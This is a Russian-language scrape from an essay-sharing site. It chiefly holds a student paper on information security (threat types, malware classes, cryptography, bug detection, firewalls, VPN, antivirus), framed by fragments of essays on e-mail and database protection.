Следует учитывать, что большинство сбоев в обеспечении информационной безопасности происходит не из-за найденных слабостей в криптографических алгоритмах и протоколах, а из-за вопиющих оплошностей в их реализации.
Данная мера, которая в основном используется для усиления защиты электронных коммерческих операций, может быть реализована и для защиты обычной e-mail. Это построение многоуровневой эшелонированной системы обороны, которая заключается в реализации защиты на нескольких уровнях модели OSI. Например, если какие-то приложения Web имеют встроенные протоколы защиты данных (для e-mail это могут быть PGP или S/MIME), использование IPSec позволяет усилить эту защиту.
Надо отметить, что SSL защищает письма только при передаче и если не используются другие средства криптозащиты, то письма при хранении в почтовых ящиках и на промежуточных серверах находятся в открытом виде.
В этом случае надо использовать средства шифрования прикладного уровня (S/MIME) или сеансового уровня (IPSec), на котором реализуется шифрование всего пакета IP (или TCP в зависимости от режима).
Источники информации:
Вильям Столингс, Криптография и защита сетей: принципы и практика, 2-е издание: пер. с английского – М, : Издательский дом «Вильямс», 2001.
Материалы электронной библиотеки InfoCity. (www.infocity.ru)
Материалы сервера www.citforum.ru
1 |
https://doc4web.ru/informatika/zaschita-informacii-1.html | Защита информации 2 4 | https://doc4web.ru/uploads/files/163/21ded67d1edc2b61de3c81225ead6a7f.docx | files/21ded67d1edc2b61de3c81225ead6a7f.docx | 1. Свойства информации
1.1 Свойства информации
Как и всякий объект, информация обладает свойствами. Характерной отличительной особенность информации от других объектов природы и общества, является дуализм: на свойства информации влияют как свойства данных, составляющих её содержательную часть, так и свойства методов, взаимодействующих с данными в ходе информационного процесса. По окончании процесса, свойства информации переносятся на свойства новых данных, т.е. свойства методов могут переходить на свойства данных.
С точки зрения информатики наиболее важными представляются следующие свойства: объективность, полнота, достоверность, адекватность, доступность и актуальность информации.
Понятие объективности информации является относительным, это понятно, если учесть, что методы являются субъективными. Более объективной принято считать ту информацию, в которую методы вносят меньший субъективные элемент.
Полнота информации во многом характеризует её качество и определяет достаточность данных для принятия решений или для создания новых данных на основе имеющихся. Чем полнее данные, тем шире диапазон методов, которые можно использовать, тем проще подобрать метод, вносящий минимум погрешностей в ход информационного процесса.
Данные возникают в момент регистрации сигналов, но не все сигналы являются «полезными» - всегда присутствует какой-то уровень посторонних сигналов, в результате чего полезные данные сопровождаются определённым уровнем «информационного шума». Если полезный сигнал зарегистрирован более чётко, чем посторонние сигналы, достоверность информации может быть более высокой. При увеличении уровня шумов достоверность информации снижается. В этом случае при передаче того же количества информации требуется использовать либо больше данных, либо более сложные методы.
Адекватность информации – степень соответствия реальному объективному состоянию дела. Неадекватная информация может образовываться при создании новой информации на основе неполных или недостоверных данных. Однако и полные, и достоверные данные могут приводить к созданию неадекватной информации в случае применения к ним неадекватных методов.
Доступность информации – мера возможности получить ту или иную информацию. На степень доступности информации влияют одновременно как доступность данных, так и доступность адекватных методов для их интерпретации. Отсутствие доступа к данным или отсутствие адекватных методов обработки приводят к одинаковому результату: информация оказывается недоступной.
Актуальность информации – степень соответствия информации текущему моменту времени. Нередко с актуальностью, как и с полнотой, связывают коммерческую ценность информации. Поскольку информационные процессы растянуты во времени, то достоверная и адекватная, но устаревшая информация может приводить к ошибочным решениям. Необходимость поиска (или разработки) адекватного метода для работы с данными может приводить к такой задержке получения информации, что она становится неактуальной и ненужной. На этом, в частности, основаны многие современные системы шифрования данных с открытым ключом. Лица, не владеющие ключом (методом) для чтения данных, могут заняться поиском ключа, поскольку алгоритм его работы доступен, но продолжительность этого поиска столь велика, что за время работы информация теряет актуальность и, естественно связанную с ней практическую ценность.
1.2 Носители данных
Данные – диалектическая составная часть информации. Они представляют собой зарегистрированные сигналы. При этом физический метод регистрации может быть любым: механическое перемещение физических тел, изменение их формы или параметров качества поверхности, изменение электрических, магнитных, оптических характеристик, химического состава или характера химических связей, изменение состояние электронной системы и многое другое. В соответствии с методом регистрации данные могут храниться транспортироваться на носителях различных видов.
Самым распространённым носителем данных, хотя и не самым экономичным является бумага. На бумаге данные регистрируются путём изменения оптических характеристик её поверхности. Изменение оптических свойств используется также в устройствах осуществляющих запись лазерным лучом на пластмассовых носителях с отражающим покрытием (CD-ROM). В качестве носителей, использующих изменение магнитных свойств, можно назвать магнитные ленты и диски. Регистрация данных путём изменения химического состава поверхностных веществ носителя широко используется в фотографии. На биохимическом уровне происходит накопление и передача данных в живой природе. От свойств носителя нередко зависят такие свойства информации, как полнота, доступность и достоверность.
1.3 Операции с данными
В ходе информационного процесса данные преобразуются из одного вида в другой с помощью методов. Обработка данных включает в себя множество различных операций. По мере развития научно-технического прогресса и общего усложнения связей в человеческом обществе трудозатраты на обработку данных неуклонно возрастают. Прежде всего, это связано с постоянным усложнением условий управления производством и обществом. Второй фактор, также вызывающий общее увеличение объёмов обрабатываемых данных, тоже связан с научно-техническим прогрессом, а именно с быстрыми темпами появления и внедрения новых носителей данных, средств их хранения и доставки.
Основные операции, которые можно производить с данными:
сбор данных – накопление информации с целью обеспечения достаточной полноты для принятия решений;
формализация данных – приведения данных, поступающих из разных источников, к одинаковой форме, чтобы сделать их сопоставимыми между собой, т.е. повысить их уровень доступности;
фильтрация данных – отсеивание лишних данных, в которых нет необходимости для принятия решений; при этом должен уменьшатся уровень «шума», а достоверность и адекватность данных должны возрастать;
сортировка данных – упорядочивание данных по заданному признаку с целью удобства использования; повышает доступность информации;
архивация данных - организация хранения данных в удобной и легкодоступной форме; служит для снижения экономических затрат по хранению данных и повышает общую надёжность информационного процесса в целом;
защита данных – комплекс мер, направленных на предотвращение утраты, воспроизведения и модификации данных;
приём передача данных между удалёнными участниками информационного процесса; при этом источник данных в информатике принято называть сервером, а потребителя – клиентом;
преобразование данных – перевод данных из одной формы в другую или из одной структуры в другую. Преобразование данных часто связано с изменением типа носителя.
2. Виды умышленных угроз безопасности информации
2.1 Пассивные и активные угрозы
Пассивные угрозы направлены в основном на несанкционированное использование информационных ресурсов, не оказывая при этом влияния на ее функционирование. Например, несанкционированный доступ к базам данных, прослушивание каналов связи и т.д.
Активные угрозы имеют целью нарушение нормального функционирования информационной системы путем целенаправленного воздействия на ее компоненты. К активным угрозам относятся, например, вывод из строя компьютера или его операционной системы, разрушение программного обеспечения компьютеров, нарушение работы линий связи и т.д. Источником активных угроз могут быть действия взломщиков, вредоносные программы и т.п.
Умышленные угрозы подразделяются на внутренние (возникающие внутри управляемой организации) и внешние.
Внутренние угрозы чаще всего определяются социальной напряженностью и тяжелым моральным климатом.
Внешние угрозы могут определяться злонамеренными действиями конкурентов, экономическими условиями и другими причинами (например, стихийными бедствиями). Широкое распространение получил промышленный шпионаж - это наносящий ущерб владельцу коммерческой тайны незаконные сбор, присвоение и передача сведений, составляющих коммерческую тайну, лицом, не уполномоченным на это ее владельцем.
К основным угрозам безопасности информации и нормального функционирования информационных систем относятся:
ошибочное использование информационных ресурсов;
несанкционированный обмен информацией между абонентами;
отказ от информации;
нарушение информационного обслуживания;
незаконное использование привилегий.
утечка конфиденциальной информации;
компрометация информации;
Ошибочное использование информационных ресурсов будучи санкционированным тем не менее может привести к разрушению, утечке или компрометации указанных ресурсов. Данная угроза чаще всего является следствием ошибок, имеющихся в программном обеспечении информационных технологий.
Несанкционированный обмен информацией между абонентами может привести к получению одним из них сведений, доступ к которым ему запрещен. Последствия — те же, что и при несанкционированном доступе.
Отказ от информации состоит в непризнании получателем или отправителем этой информации фактов ее получения или отправки. Это позволяет одной из сторон расторгать заключенные финансовые соглашения техническим путем, формально не отказываясь от них, нанося тем самым второй стороне значительный ущерб.
Нарушение информационного обслуживания - угроза, источником которой являются информационные технологии. Задержка с предоставлением информационных ресурсов абоненту может привести к тяжелым для него последствиям.
Незаконное использование привилегий. Любая защищенная система содержит средства, используемые в чрезвычайных ситуациях, или средства которые способны функционировать с нарушением существующей политики безопасности. Например, на случай внезапной проверки пользователь должен иметь возможность доступа ко всем наборам системы. Обычно эти средства используются администраторами, операторами, системными программистами и другими пользователями, выполняющими специальные функции.
Компрометация информации (один из видов информационных инфекций). Реализуется, как правило, посредством несанкционированных изменений в базе данных в результате чего ее потребитель вынужден либо отказаться от нее, либо предпринимать дополнительные усилия для выявления изменений и восстановления истинных сведений. При использовании скомпрометированной информации потребитель подвергается опасности принятия неверных решений.
Утечка конфиденциальной информации — это бесконтрольный выход конфиденциальной информации за пределы круга лиц, которым она была доверена по службе или стала известна в процессе работы.
Эта утечка может быть следствием:
разглашения конфиденциальной информации;
ухода информации по различным, главным образом техническим, каналам;
несанкционированного доступа к конфиденциальной информации различными способами.
Разглашение информации ее владельцем или обладателем есть умышленные или неосторожные действия должностных лиц и пользователей, которым соответствующие сведения в установленном порядке были доверены по службе или по работе, приведшие к ознакомлению с ним лиц, не допущенных к этим сведениям.
Возможен бесконтрольный уход конфиденциальной информации по визуально-оптическим, акустическим, электромагнитным и другим каналам.
Несанкционированный доступ — это противоправное преднамеренное овладение конфиденциальной информацией лицом, не имеющим права доступа к охраняемым сведениям.
Наиболее распространенными путями несанкционированного доступа к информации являются:
перехват электронных излучений;
принудительное электромагнитное облучение (подсветка) линий связи с целью получения паразитной модуляции несущей;
применение подслушивающих устройств (закладок);
дистанционное фотографирование;
перехват акустических излучений и восстановление текста принтера;
чтение остаточной информации в памяти системы после выполнения санкционированных запросов;
копирование носителей информации с преодолением мер защиты
маскировка под зарегистрированного пользователя;
маскировка под запросы системы;
использование программных ловушек;
использование недостатков языков программирования и операционных систем;
незаконное подключение к аппаратуре и линиям связи специально разработанных аппаратных средств, обеспечивающих доступ информации;
злоумышленный вывод из строя механизмов защиты;
расшифровка специальными программами зашифрованной: информации;
информационные инфекции.
Перечисленные пути несанкционированного доступа требуют достаточно больших технических знаний и соответствующих аппаратных или программных разработок со стороны взломщика. Например, используются технические каналы утечки - это физические пути от источника конфиденциальной информации к злоумышленнику, посредством которых возможно получение охраняемых сведений. Причиной возникновения каналов утечки являются конструктивные и технологические несовершенства схемных решений либо эксплуатационный износ элементов. Все это позволяет взломщикам создавать действующие на определенных физических принципах преобразователи, образующие присущий этим принципам канал передачи информации— канал утечки.
Однако есть и достаточно примитивные пути несанкционированного доступа:
хищение носителей информации и документальных отходов;
инициативное сотрудничество;
склонение к сотрудничеству со стороны взломщика;
выпытывание;
подслушивание;
наблюдение и другие пути.
Любые способы утечки конфиденциальной информации могут привести к значительному материальному и моральному ущербу, как для организации, где функционирует информационная система, так и для ее пользователей.
Довольно большая часть причин и условий, создающих предпосылки и возможность неправомерного овладения конфиденциальной информацией, возникает из-за элементарных недоработок руководителей организаций и их сотрудников. Например, к причинам и условиям, создающим предпосылки для утечки коммерческих секретов, могут относиться:
недостаточное знание работниками организации правил защиты конфиденциальной информации и непонимание необходимости их тщательного соблюдения;
использование неаттестованных технических средств обработки конфиденциальной информации;
слабый контроль за соблюдением правил защиты информации правовыми, организационными и инженерно-техническими мерами;
текучесть кадров, в том числе владеющих сведениями, составляющими коммерческую тайну.
Также большой вред могут нанести вредоносные программы.
2.2 Вредоносные программы
Вредоносные программы классифицируются следующим образом:
Логические бомбы - как вытекает из названия, используются для искажения или уничтожения информации, реже с их помощью совершаются кража или мошенничество. Манипуляциями с логическими бомбами обычно занимаются чем-то недовольные служащие, собирающиеся покинуть данную организацию, но это могут быть и консультанты, служащие с определенными политическими убеждениями и т.п.
Троянский конь - программа, выполняющая в дополнение к основным, т. е. запроектированным и документированным действиям, действия дополнительные, не описанные в документации. Троянский конь представляет собой дополнительный блок команд, тем или иным образом вставленный в исходную безвредную программу, которая затем передается (дарится, продается, подменяется) пользователям. Этот блок команд может срабатывать при наступлении некоторого условия (даты, времени, по команде извне и т.д.).
Вирус - программа, которая может заражать другие программы путем включения в них модифицированной копии, обладающей способностью к дальнейшему размножению.
Считается, что вирус характеризуется двумя основными особенностями:
способностью к саморазмножению;
способностью к вмешательству в вычислительный процесс (т. е. к получению возможности управления).
Червь — программа, распространяющаяся через сеть и не оставляющая своей копии на магнитном носителе. Червь использует механизмы поддержки сети для определения узла, который может быть заражен. За тем с помощью тех же механизмов передает свое тело или его часть на этот узел и либо активизируется, либо ждет для этого подходящих условий.
Захватчик паролей — это программы, специально предназначенные для воровства паролей. При попытке обращения пользователя к терминалу системы на экран выводится информация, необходимая для окончания сеанса работы. Пытаясь организовать вход, пользователь вводит имя и пароль, которые пересылаются владельцу программы- захватчика, после чего выводится сообщение об ошибке, а ввод и управление возвращаются к операционной системе.
3. Методы и средства защиты информации
3.1 Методы защиты информации
Установка препятствия — метод физического преграждения пути злоумышленнику к защищаемой информации, в т.ч. попыток с использованием технических средств съема информации и воздействия на нее.
Управление доступом — метод защиты информации за счет регулирования использования всех информационных ресурсов, в т.ч. автоматизированной информационной системы предприятия. Управление доступом включает следующие функции защиты:
идентификацию пользователей, персонала и ресурсов информационной системы (присвоение каждому объекту персонального идентификатора);
аутентификацию (установление подлинности) объекта или субъекта по предъявленному им идентификатору;
проверку полномочий (проверка соответствия дня недели, времени суток, запрашиваемых ресурсов и процедур установленному регламенту);
разрешение и создание условий работы в пределах установленного регламента;
регистрацию (протоколирование) обращений к защищаемым ресурсам;
реагирование (сигнализация, отключение, задержка работ, отказ в запросе) при попытках несанкционированных действий.
Маскировка — метод защиты информации с использованием инженерных, технических средств, а также путем криптографического закрытия информации.
Криптографические методы защиты информации
Современная криптография включает в себя четыре крупных раздела:
Симметричные криптосистемы. В симметричных криптосистемах и для шифрования, и для дешифрования используется один и тот же ключ. (Шифрование - преобразовательный процесс: исходный текст, который носит также название открытого текста, заменяется шифрованным текстом, дешифрование - обратный шифрованию процесс. На основе ключа шифрованный текст преобразуется в исходный);
Криптосистемы с открытым ключом. В системах с открытым ключом используются два ключа - открытый и закрытый, которые математически связаны друг с другом. Информация шифруется с помощью открытого ключа, который доступен всем желающим, а расшифровывается с помощью закрытого ключа, известного только получателю сообщения.( Ключ - информация, необходимая для беспрепятственного шифрования и дешифрования текстов.);
Электронная подпись. Системой электронной подписи называется присоединяемое к тексту его криптографическое преобразование, которое позволяет при получении текста другим пользователем проверить авторство и подлинность сообщения.
Управление ключами. Это процесс системы обработки информации, содержанием которых является составление и распределение ключей между пользователями.
Основные направления использования криптографических методов - передача конфиденциальной информации по каналам связи (например, электронная почта), установление подлинности передаваемых сообщений, хранение информации (документов, баз данных) на носителях в зашифрованном виде.
3.2 Средства защиты информации
Средства защиты информации можно разделить на:
Средства, предназначенные для защиты информации. Эти средства не предназначены для непосредственной обработки, хранения, накопления и передачи защищаемой информации, но находящиеся в одном помещении с ними.
Делятся на:
пассивные – физические (инженерные) средства, технические средства обнаружения, приборы контроля радиоэфира, линий связи и т.п.;
активные – источники бесперебойного питания, шумогенераторы, скремблеры, устройства отключения линии связи, программно-аппаратные средства маскировки информации и др.
Пассивные средства защиты акустического и виброакустического каналов утечки речевой информации.
Для предотвращения утечки речевой информации по акустическому и виброакустическому каналам, осуществляются мероприятия по выявлению каналов утечки. В большинстве случаев для несанкционированного съема информации из помещения противник применяет соответствующие замыслу закладные устройства.
Всю процедуру поиска закладных устройств можно условно разбить на несколько этапов:
• физический поиск и визуальный осмотр;
• обнаружение радиозакладных устройств как электронных средств;
• проверка наличия каналов утечки информации.
Физический поиск и визуальный осмотр.
Осмотр осуществляется путем обследования всех предметов в зоне контроля, размеры которых достаточно велики для того, чтобы можно было разместить в них технические средства негласного съема информации (настольные приборы, рамы картин, телефоны, цветочные горшки, книги, питаемые от сети устройства: компьютеры, ксероксы, радиоприемники и т. д.).
Физический поиск и визуальный осмотр объектов проводят с применением специальных средств видеонаблюдения и металлодетекторов.
Обнаружение радиозакладных устройств (РЗУ).
Необнаруженных РЗУ при визуальном осмотре осуществляют по их демаскирующим признакам с применением специальных средств обнаружения. РЗУ, как правило, содержат в своей конструкции электронные схемы и, при своей работе излучают радиосигнал.
Основными признаками излучения радиозакладок являются:
относительно высокий уровень излучения, обусловленный необходимостью передачи сигнала за пределы контролируемого помещения.
непрерывная или непрерывная в течение некоторого времени работа (прерывистый режим работы днем и практически, полное молчание ночью; излучение возникает одновременно с поднятием трубки и исчезает, когда трубка положена).
появление нового источника в обычно свободном частотном диапазоне.
использование в ряде радиозакладок направленных антенн приводит к сильной локализации излучения, то есть существенной неравномерности его уровня в пределах контролируемого объекта.
особенности поляризации излучения радиозакладок. При изменении пространственного положения или ориентации приемной антенны наблюдается изменение уровня всех источников. Однако однотипные удаленные источники одного диапазона ведут себя примерно одинаково, тогда как сигнал закладки изменяется отлично от остальных. Эффект поляризации обнаруживается при использовании анализаторов спектра.
изменение («размывание») спектра излучений радиомикрофонов при возникновении каких-либо шумов в контролируемом помещении. Он проявляется только в том случае, если РЗУ работает без кодирования передаваемой информации.
К основным устройствам, применяемым для обнаружения РЗУ относятся:
- индикаторы поля;
- специальные радиоприемники;
- программно-аппаратные комплексы радиоконтроля;
- нелинейные радиолокаторы.
Индикаторы поля – приборы определяющие наличие ЗУ по их радиоизлучению. Индикаторы, или детекторы поля являются простейшими средствами обнаружения факта использования радиозакладок. Это приемники с низкой чувствительностью, поэтому они обнаруживают излучения радиозакладных устройств на предельно малых расстояниях (10- 40 см), чем и обеспечивается селекция «нелегальных» излучений на фоне мощных «разрешенных» сигналов. Важное достоинство детекторов - способность находить передающие устройства вне зависимости от применяемой в них модуляции. Основной принцип поиска состоит в выявлении абсолютного максимума уровня излучения в помещении.
Иногда детекторы используют и в так называемом сторожевом режиме. В этом случае после полной проверки помещения на отсутствие ЗУ фиксируется уровень поля в некоторой точке пространства (обычно это стол руководителя или место ведения переговоров), и прибор переводится в дежурный режим. В случае включения закладки (примерно на удалении до двух метров от детектора), индикатор выдает сигнал о повышении уровня электромагнитного поля. Однако необходимо учитывать тот факт, что если будет использоваться радиозакладка с очень низким уровнем излучения, то детектор скорее всего не зафиксирует ее активизацию.
Радиоприемные устройства, как устройства выявления радиозакладок, должны удовлетворять трем основным условиям:
иметь возможность настройки на частоту работы устройств, скрытно передающих перехваченную информацию, т.е. иметь возможность контролировать большой набор частот либо одновременно во всем диапазоне либо перестраиваясь от значения к значению за предельно малый промежуток времени - панорамные приемники;
обладать функциями выделения нужного сигнала по характерным признакам на фоне мешающих сигналов и помех (избирательность по спектру частот);
обладать способностью к демодуляции различных видов сигналов (избавляться от сигнала несущей частоты, а полезный сигнал преобразовывать в низкочастотный сигнал и демодулировать с помощью детектора, соответствующего типу использованной модуляции).
Программно-аппаратные комплексы радиоконтроля-для расширения возможностей специальных приемников их функционально совмещают с персональными компьютерами, что существенно повышает надежность и оперативность поиска ЗУ, делает процедуру выявления более удобной (технологичной).
На компьютер при этом возлагается решение следующих задач:
хранение априорной информации о радиоэлектронных средствах, работающих в контролируемой области пространства и выбранных диапазонах частот;
получение программными методами временных и частотных характеристик принимаемых сигналов;
тестирование принимаемых сигналов по совокупности признаков на принадлежность к излучению ЗУ.
Программно-аппаратные комплексы радиоконтроля обеспечивают:
выявление излучений РЗУ;
пеленгование РЗУ в реальном масштабе времени;
определение дальности до источников излучения;
аналого-цифровую обработку сигналов с целью определения их принадлежности к излучению РЗУ;
контроль силовых, телефонных, радиотрансляционных и других сетей;
работу в многоканальном режиме, позволяющем контролировать несколько объектов одновременно;
постановку прицельных помех на частотах излучения РЗУ и др.
Программно-аппаратные комплексы радиоконтроля состоят из следующих элементов:
широкодиапазонного перестраиваемого по частоте приемника (сканера);
блока распознавания РЗУ, осуществляющего идентификацию излучений радиомикрофонов на основе сравнения принятых детектированных сигналов с естественным акустическим фоном помещения (пассивный способ) или тестовым акустическим сигналом (активный способ);
блока акустической локации, позволяющего по запаздыванию переизлученного зондирующего звукового импульса определять расстояние до активных радиомикрофонов;
электронно-вычислительной машины (процессора), осуществляющей как обработку полученных данных, так и управление приемником.
По принципу построения все известные приборы данного класса делятся на две основные группы:
специально разработанные комплексы, конструктивно выполненные в виде единого устройства;
комплексы, сформированные на базе серийного сканера, персонального компьютера (обычно notebook) и специального программного обеспечения.
Нелинейные радиолокаторы применяются для поиска внедренных РЗУ, не использующих радиоканал для передачи информации, а также РЗУ, находящихся в пассивном (неизлучающем) состоянии.
Нелинейные радиолокаторы - приборы, излучающие электромагнитную волну с частотой f, а принимающие переизлученные сигналы на частотах f. Если такие сигналы будут обнаружены, то в зоне действия локатора есть полупроводниковые элементы, и их необходимо проверить на возможную принадлежность к ЗУ. Нелинейный радиолокатор обнаруживает только радиоэлектронную аппаратуру и, в отличие от классического линейного радиолокатора, «не видит» отражений от окружающих предметов, то есть обладает высокой избирательностью. Источниками помех для его работы могут служить контакты со слабым прижимом, для которых характерно наличие промежуточного окисного слоя.
Активные технические средства защиты акустического и виброакустического канала.
Для активной защиты речевой информации от необнаруженных закладных устройств и съема по другим каналам используется аппаратура активной защиты:
Технические средства пространственного зашумления;
Устройства виброакустической защиты;
Технические средства ультразвуковой защиты.
Технические средства пространственного и линейного зашумления.
По принципу действия все технические средства пространственного и линейного зашумления можно разделить на три большие группы:
Средства создания акустических маскирующих помех:
генераторы шума в акустическом диапазоне;
устройства виброакустической защиты;
технические средства ультразвуковой защиты помещений;
Средства создания электромагнитных маскирующих помех:
технические средства пространственного зашумления;
технические средства линейного зашумления, которые в свою очередь делятся на средства создания маскирующих помех в коммуникационных сетях и средства создания маскирующих помех в сетях электропитания;
многофункциональные средства защиты.
3.3 Защита информации в компьютерных сетях
Программные средства защиты информации.
Специализированные программные средства защиты информации от несанкционированного доступа обладают в целом лучшими возможностями и характеристиками, чем встроенные средства сетевых ОС. Кроме программ шифрования, существует много других доступных внешних средств защиты информации. Из наиболее часто упоминаемых следует отметить следующие две системы, позволяющие ограничить информационные потоки.
Firewalls - брандмауэры (дословно firewall — огненная стена). Между локальной и глобальной сетями создаются специальные промежуточные сервера, которые инспектируют и фильтруют весь проходящий через них трафик сетевого/ транспортного уровней. Это позволяет резко снизить угрозу несанкционированного доступа извне в корпоративные сети, но не устраняет эту опасность совсем. Более защищенная разновидность метода - это способ маскарада (masquerading), когда весь исходящий из локальной сети трафик посылается от имени firewall-сервера, делая локальную сеть практически невидимой.
Proxy-servers (proxy - доверенность, доверенное лицо). Весь трафик сетевого/транспортного уровней между локальной и глобальной сетями запрещается полностью — попросту отсутствует маршрутизация как таковая, а обращения из локальной сети в глобальную происходят через специальные серверы-посредники. Очевидно, что при этом методе обращения из глобальной сети в локальную становятся невозможными в принципе.
VPN (виртуальная частная сеть) позволяет передавать секретную информацию через сети, в которых возможно прослушивание трафика посторонними людьми. Используемые технологии:
PPTP(туннельный протокол типа точка-точка, позволяющий компьютеру устанавливать защищённое соединение с сервером за счёт создания специального туннеля в стандартной, незащищённой сети. PPTP помещает (инкапсулирует) кадры PPP в IP-пакеты для передачи по глобальной IP-сети, например Интернет.),
PPPoE(сетевой протокол передачи кадров PPP через Ethernet. В основном используется xDSL-сервисами. Предоставляет дополнительные возможности (аутентификация, сжатие данных, шифрование),
IPSec (набор протоколов для обеспечения защиты данных, передаваемых по межсетевому протоколу IP, позволяет осуществлять подтверждение подлинности и/или шифрование IP-пакетов. IPsec также включает в себя протоколы для защищённого обмена ключами в сети Интернет.)
Аппаратные средства защиты информации
К аппаратным средствам защиты относятся различные электронные, электронно-механические, электронно-оптические устройства. К настоящему времени разработано значительное число аппаратных средств различного назначения, однако наибольшее распространение получают следующие:
специальные регистры для хранения реквизитов защиты: паролей, идентифицирующих кодов, грифов или уровней секретности;
устройства измерения индивидуальных характеристик человека (голоса, отпечатков) с целью его идентификации;
схемы прерывания передачи информации в линии связи с целью периодической проверки адреса выдачи данных.
устройства для шифрования информации (криптографические методы).
Защита от воздействия вредоносных программ
В настоящее время одним из основных вопросов обеспечения безопасности информации является защита от вредоносных программ. Существует огромное множество разновидностей вредоносных программ: вирусы, троянские кони, сетевые черви, логические бомбы, - и с каждым днем их становится все больше и больше. Защита от вредоносных программ не ограничивается лишь традиционной установкой антивирусных средств на рабочие станции пользователей. Это сложная задача, требующая комплексного подхода к решению.
Одно из главных преимуществ данного решения - рассмотрение подсистемы защиты информации от вредоносных программ как многоуровневой системы.
Первый уровень включает в себя средства защиты от вредоносных программ, устанавливаемые на стыке с глобальными сетями (Интернет-шлюз и/или межсетевой экран; публичные серверы Web, SMTP, ftp.) и осуществляющие фильтрацию основных видов трафика (HTTP, SMTP, FTP и т. д. )
Второй уровень - средства защиты, устанавливаемые на внутренних корпоративных серверах и серверах рабочих групп (файловых хранилищах, серверах приложений и т.д.).
И, наконец, третий уровень - средства защиты от вредоносных программ, устанавливаемые на рабочих станциях пользователей, включая удаленных и мобильных пользователей.
Преимущества данного решения заключаются:
в использовании продуктов мировых лидеров;
в централизованном управлении всей подсистемой защиты от вредоносных программ;
в автоматическом обновлении антивирусных баз;
в тесном взаимодействии антивирусных средств всех уровней подсистемы и т. д.
Защита от компьютерных вирусов.
Основным средством борьбы с вирусами были и остаются антивирусные программы. Можно использовать антивирусные программы (антивирусы), не имея представления о том, как они устроены. Однако без понимания принципов устройства антивирусов, знания типов вирусов, а также способов их распространения, нельзя организовать надежную защиту компьютера. Как результат, компьютер может быть заражен, даже если на нем установлены антивирусы.
Сегодня используется несколько основополагающих методик обнаружения и защиты от вирусов:
сканирование;
эвристический анализ;
использование антивирусных мониторов;
обнаружение изменений;
использование антивирусов, встроенных в BIOS компьютера.
Кроме того, практически все антивирусные программы обеспечивают автоматическое восстановление зараженных программ и загрузочных секторов. Конечно, если это возможно.
Особенности защиты корпоративной интрасети
Корпоративня интрасеть может насчитывать сотни и тысячи компьютеров, играющих роль рабочих станций и серверов. Эта сеть обычно подключена к Интернету и в ней имеются почтовые серверы, серверы систем автоматизации документооборота, такие как Microsoft Exchange и Lotus Notes, а также нестандартные информационные системы.
Для надежной защиты корпоративной интрасети необходимо установить антивируы на все рабочие станции и серверы. При этом на файл-серверах, серверах электронной почты и серверах систем документооборота следует использовать специальное серверное антивирусное программное обеспечение. Что же касается рабочих станций, их можно защитить обычными антивирусными сканерами и мониторами.
Разработаны специальные антивирусные прокси-серверы и брандмауэры, сканирующие проходящий через них трафик и удаляющие из него вредоносные программные компоненты. Эти антивирусы часто применяются для защиты почтовых серверов и серверов систем документооборота.
Защита почтовых серверов.
Антивирусные мониторы неэффективны для обнаружения вирусов в почтовых сообщениях. Для этого необходимы специальные антивирусы, способные фильтровать трафик SMTP, POP3 и IMAP, исключая попадание зараженных сообщений на рабочие станции пользователей.
Для защиты почтовых серверов можно приобрести антивирусы, специально предназначенные для проверки почтового трафика, или подключить к почтовому серверу обычные антивирусы, допускающие работу в режиме командной строки.
Защита нестандартных информационных систем
Для антивирусной защиты нестандартных информационных систем, хранящих данные в собственных форматах, необходимо либо встраивать антивирусное ядру в систему, либо подключать внешний сканер, работающий в режиме командной строки.
3.4 Защита от внутренних угроз
При поступлении на работу работодатель должен провести проверку личности.
Методы изучения личности.
Изучения жизненного пути личности.
Изучение мнения коллектива(ов) в котором работает(ал) человек.
Изучения ближнего окружения.
Изучения высказывания личности о своей роли в коллективе и.т.д.
Эти методы помогают побольше узнать о человеке.
Качества не способствующие к доверенности тайны:
Эмоциональное расстройство
Неуравновешенность поведения
Разочарование в себе
Отчуждение от коллег по работе
Недовольство своим служебным положением
Ущемлённое самолюбие
Эгоистичный характер
Нечестность
Употребление наркотиков и алкоголя
Мотивация – процесс побуждения себя и других к деятельности для достижения личных целей или целей организации.
В первую очередь среди мотивов следует выделить: интерес к деятельности чувство долга, стремление к профессиональному росту.
Так – же начальник должен одинаково относиться ко всем работникам, поощрять и развивать подчинённых за их творческие способности, продвигать подчинённых по карьерной лестнице и т. д.
Заключение
Нужно четко представлять себе, что никакие аппаратные, программные и любые другие решения не смогут гарантировать абсолютную надежность и безопасность данных в любой организации. В то же время можно существенно уменьшить риск потерь при комплексном подходе к вопросам безопасности. Средства защиты информации нельзя проектировать, покупать или устанавливать до тех пор, пока специалистами не произведен соответствующий анализ. Анализ должен дать объективную оценку многих факторов (подверженность появлению нарушения работы, вероятность появления нарушения работы, ущерб от коммерческих потерь и др.) и предоставить информацию для определения подходящих средств защиты – административных, аппаратных, программных и прочих.
Однако обеспечение безопасности информации - дорогое дело. Большая концентрация защитных средств в информационной системе может привести не только к тому, что система окажется очень дорогостоящей и потому нерентабельной и неконкурентоспособной, но и к тому, что у нее произойдет существенное снижение коэффициента готовности. Например, если такие ресурсы системы, как время центрального процессора будут постоянно тратиться на работу антивирусных программ, шифрование, резервное архивирование, протоколирование и тому подобное, скорость работы пользователей в такой системе может упасть до нуля.
Так же стоит большое внимание уделять и внутренним угрозам. Даже самый честный и преданный сотрудник может оказаться средством утечки информации.
Главное при определении мер и принципов защиты информации это квалифицированно определить границы разумной безопасности и затрат на средства защиты с одной стороны и поддержания системы в работоспособном состоянии и приемлемого риска с другой.
Список литературы
1 Симонович С.В. Информатика.
2 Барсуков В.С. Безопасность: технологии, средства, услуги.
3 Барсуков В.С. Современные технологии безопасности.
4 www.infosecmd.narod.ru
5 www.informyx.ru
6 www.inattack.ru
7 www.osp.ru |
https://doc4web.ru/informatika/zaschita-baz-dannih.html | Защита баз данных | https://doc4web.ru/uploads/files/139/d4a77b48818c511ca04caebfdd412833.docx | files/d4a77b48818c511ca04caebfdd412833.docx | Защита баз данных
Работу подготовил Милованов Сергей
ГОУ СПО Жирновский нефтяной техникум
2005 г.
Введение
Современная жизнь немыслима без эффективного управления. Важной категорией являются системы обработки информации, от которых во многом зависит эффективность работы любого предприятия ли учреждения. Такая система должна:
обеспечивать получение общих и/или детализированных отчетов по итогам работы;
позволять легко определять тенденции изменения важнейших показателей;
обеспечивать получение информации, критической по времени, без существенных задержек;
выполнять точный и полный анализ данных.
